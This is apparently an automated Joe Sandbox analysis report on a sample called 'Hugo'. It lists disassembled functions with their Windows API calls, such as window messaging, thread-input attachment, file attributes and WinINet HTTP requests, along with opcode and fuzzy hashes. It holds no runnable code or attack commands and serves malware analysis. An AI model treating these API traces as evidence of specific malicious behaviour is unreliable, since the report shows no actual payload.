                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                              • String ID: 0$F
                                                                                                                                                                                                              • API String ID: 161812096-3044882817
                                                                                                                                                                                                              • Opcode ID: 7e74fc83084bc4e708954c8f419c59d24de65155e80b6c0b5bd3ff60bbb75376
                                                                                                                                                                                                              • Instruction ID: 5fcf856cb55f02ccd03a73266872cd48d657843429d92d159e4afad68b957c98
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e74fc83084bc4e708954c8f419c59d24de65155e80b6c0b5bd3ff60bbb75376
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7418FB5A01249EFDB14CF64E884EAA7BB5FF8A314F144028FA4697390D7B4A910EF50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F728B1
                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00F728BC
                                                                                                                                                                                                              • GetParent.USER32 ref: 00F728D8
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F728DB
                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00F728E4
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00F728F8
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F728FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                                                              • Opcode ID: b53ef6fb20b203d72b6adbd9035a6b5ac3a9d119ff6522c6af10da3a639a1b30
                                                                                                                                                                                                              • Instruction ID: eba38a7c66f8d484225df90b66568d1d4b580d3d22f687479bf354e641e4095c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b53ef6fb20b203d72b6adbd9035a6b5ac3a9d119ff6522c6af10da3a639a1b30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21B0B5D00118BBCF14AFA0CC85EEEBBB4EF06350F044157B966A3291DB399859FB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00F72990
                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00F7299B
                                                                                                                                                                                                              • GetParent.USER32 ref: 00F729B7
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F729BA
                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00F729C3
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00F729D7
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F729DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                                                              • Opcode ID: f3b8da4e22c6cca9924ce0a1f41463225bf3b88fbc2d7fe59063c17752621e3a
                                                                                                                                                                                                              • Instruction ID: e8196f0c9b84acf8f5ed1e0801245fbd69196ca9557eba1c522e1f9de27258d9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3b8da4e22c6cca9924ce0a1f41463225bf3b88fbc2d7fe59063c17752621e3a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E221D4B6D00118BBCF04AFA0CC85EEEBBB8EF05350F044057B95593291CB399859FB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FA4539
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FA453C
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA4563
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FA4586
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FA45FE
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FA4648
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FA4663
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FA467E
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FA4692
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FA46AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                                                                                              • Opcode ID: 949bcf9eb194ab5162c55d6b06ccd2801c82f0d84c37adcea786854a23beb8fe
                                                                                                                                                                                                              • Instruction ID: be36e80e692df5d02eeee7cb41631b9402d8eec5cf7307accbd12a89c9dfbd35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 949bcf9eb194ab5162c55d6b06ccd2801c82f0d84c37adcea786854a23beb8fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F617FB5940248AFDB10DF64CC81EEEB7B8EF4A710F100155FA15E7391D7B4A946EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00F7BB18
                                                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB2C
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00F7BB33
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB42
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F7BB54
                                                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB6D
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB7F
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BBC4
                                                                                                                                                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BBD9
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BBE4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2156557900-0
                                                                                                                                                                                                              • Opcode ID: b11ef7e14eba6e311e4b787261f7840c8fbeca052a3a510ef469c423c8919d95
                                                                                                                                                                                                              • Instruction ID: 34df8a59700c533ef0494d0e88d4462640e66b416bcb9a1af2577a8727310f82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b11ef7e14eba6e311e4b787261f7840c8fbeca052a3a510ef469c423c8919d95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5319AB1904208AFDB149F19DCC4F697BA9EBCA322F10801AFF09D71A4D774A940AF55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F43007
                                                                                                                                                                                                                • Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
                                                                                                                                                                                                                • Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F43013
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4301E
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F43029
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F43034
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4303F
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4304A
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F43055
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F43060
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4306E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: df1a5f33bdcc070e0ab5f7535bdbda91d7a81826ee651dc4ae627726d17022ed
                                                                                                                                                                                                              • Instruction ID: 9294ca984210492439846cb0ba4b2cd3fe8b56269c6335875f0c948be6b48470
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df1a5f33bdcc070e0ab5f7535bdbda91d7a81826ee651dc4ae627726d17022ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09117476900108AFCB81EF94CC82DDD7FB5EF05350BD145B5FE089B222DA36EA51AB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F12AF9
                                                                                                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 00F12B98
                                                                                                                                                                                                              • UnregisterHotKey.USER32(?), ref: 00F12D7D
                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00F53A1B
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00F53A80
                                                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F53AAD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                              • String ID: close all
                                                                                                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                                                                                                              • Opcode ID: 1fda0cb3c57976409767aff834316476f80210ae4dc3b4910c3f47548d39929d
                                                                                                                                                                                                              • Instruction ID: 84576d728d061901184b85690d3dc0c8c61552b79989863c9945aa71900847b5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fda0cb3c57976409767aff834316476f80210ae4dc3b4910c3f47548d39929d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2D1AE71B01212DFCB18EF54C855BA9F7A0BF44761F1102ADE94A6B262CB34ED66EF40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F889F2
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88A06
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00F88A30
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F88A4A
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88A5C
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88AA5
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F88AF5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 769691225-438819550
                                                                                                                                                                                                              • Opcode ID: df873bf31b91d6a76d258020be257831e24b2e119079b022b396d548928071eb
                                                                                                                                                                                                              • Instruction ID: 8076480e6bbea6a33d88519828603adfc0128df8b05df1c73a077dba89ec4c19
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df873bf31b91d6a76d258020be257831e24b2e119079b022b396d548928071eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A81C2729043059BDB24FF14C844AFAB3D8BF847A0F94481AF885D7250DF38E946EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00F174D7
                                                                                                                                                                                                                • Part of subcall function 00F17567: GetClientRect.USER32(?,?), ref: 00F1758D
                                                                                                                                                                                                                • Part of subcall function 00F17567: GetWindowRect.USER32(?,?), ref: 00F175CE
                                                                                                                                                                                                                • Part of subcall function 00F17567: ScreenToClient.USER32(?,?), ref: 00F175F6
                                                                                                                                                                                                              • GetDC.USER32 ref: 00F56083
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F56096
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00F560A4
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00F560B9
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00F560C1
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F56152
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                                                                                                              • Opcode ID: 2c05017becb69896c8463ed52ba73e21d03336cd04a4a8d453ab599fe61b35d8
                                                                                                                                                                                                              • Instruction ID: 15c02888893eda2be830ed1b5dde0be164c08745b121225088e32bf6f5289e7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c05017becb69896c8463ed52ba73e21d03336cd04a4a8d453ab599fe61b35d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62719F31904209DFCF259F64CC84ABA7BB5EB49322F144269EE659B1A6D7318884FB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                                • Part of subcall function 00F119CD: GetCursorPos.USER32(?), ref: 00F119E1
                                                                                                                                                                                                                • Part of subcall function 00F119CD: ScreenToClient.USER32(00000000,?), ref: 00F119FE
                                                                                                                                                                                                                • Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000001), ref: 00F11A23
                                                                                                                                                                                                                • Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000002), ref: 00F11A3D
                                                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00FA95C7
                                                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00FA95CD
                                                                                                                                                                                                              • ReleaseCapture.USER32 ref: 00FA95D3
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00FA966E
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FA9681
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00FA975B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                              • API String ID: 1924731296-2107944366
                                                                                                                                                                                                              • Opcode ID: d0cab2fb1d0ab556519957aa2af0aa9fd38f36d1976d9f4b3ab421a4298c6cf0
                                                                                                                                                                                                              • Instruction ID: 0d4356c93709cd9d225a1b6272cbf8e51aab246ea1a4582aeac8d543d5d4e14e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0cab2fb1d0ab556519957aa2af0aa9fd38f36d1976d9f4b3ab421a4298c6cf0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E518DB1504344AFD704EF24CC96FAA77E4FB84710F40052DF996972E2DBB49944EB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8CCB7
                                                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8CCDF
                                                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8CD0F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F8CD67
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00F8CD7B
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00F8CD86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3113390036-3916222277
                                                                                                                                                                                                              • Opcode ID: 4b3d49b115c28462b1b173c01834cc25e88dec345bb00656db85f1fd493092fb
                                                                                                                                                                                                              • Instruction ID: 04a603d07f52395bb2b1edd5b8304674050d16831de995c81892dbb7a69d4422
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b3d49b115c28462b1b173c01834cc25e88dec345bb00656db85f1fd493092fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3316BB2A00208AFD721BF659C88AEB7BFCEB45750B10452AF45696610DB34E904ABB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F555AE,?,?,Bad directive syntax error,00FADCD0,00000000,00000010,?,?), ref: 00F7A236
                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00F555AE,?), ref: 00F7A23D
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F7A301
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
